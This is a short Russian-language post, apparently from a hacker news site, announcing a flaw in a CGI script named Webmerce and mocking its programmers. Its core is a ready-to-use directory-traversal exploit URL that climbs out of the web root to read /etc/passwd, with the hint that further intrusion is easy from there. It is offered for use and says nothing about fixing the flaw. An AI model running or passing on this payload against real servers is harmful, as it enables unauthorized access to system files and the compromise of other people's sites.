Вновь наткнулся на безграмотность
программеров… либо их лень. Найден
очередной баг в cgi скрипте под названием Webmerce.
Этот скриптец позволит вам просматривать заветные passwd файлы. Ну а дальше все просто…

Название: webmerce.cgi

Эксплоит: webmerce.cgi?page=../../../../../../../../../
../../../../../../../../../../../etc/passwd



Оставить мнение